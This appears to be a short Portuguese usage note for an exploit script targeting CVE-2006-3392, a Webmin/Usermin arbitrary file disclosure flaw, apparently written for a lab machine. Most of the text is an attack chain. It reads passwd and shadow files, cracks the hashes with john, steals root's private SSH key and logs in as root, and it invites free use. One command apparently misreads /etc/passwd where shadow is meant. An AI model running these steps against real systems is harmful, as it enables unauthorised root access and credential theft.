
Webmin < 1.290 / Usermin < 1.220 - Divulgação arbitrária de arquivos
https://www.cvedetails.com/cve/CVE-2006-3392/
Webmin anterior a 1.290 e Usermin anterior a 1.220 chama a função simplify_path antes de decodificar HTML, o que permite que atacantes remotos leiam arquivos arbitrários, conforme demonstrado usando sequências "..%01", que contornam a remoção de sequências "../" antes que bytes como "%01" sejam removidos do nome do arquivo. NOTA: Este é um problema diferente do CVE-2006-3274.
Navegue por qualquer arquivo no sistema de arquivos com privilégio de root
./exploit.sh <target ip> <target port> <file to disclose>
Navegue por passwd e shadow em 10.10.11.105, faça unshadow e quebre os hashes
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed
Navegue pela chave rsa privada em 10.10.11.105
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]
Sinta-se à vontade para usar ou modificar quando e onde quiser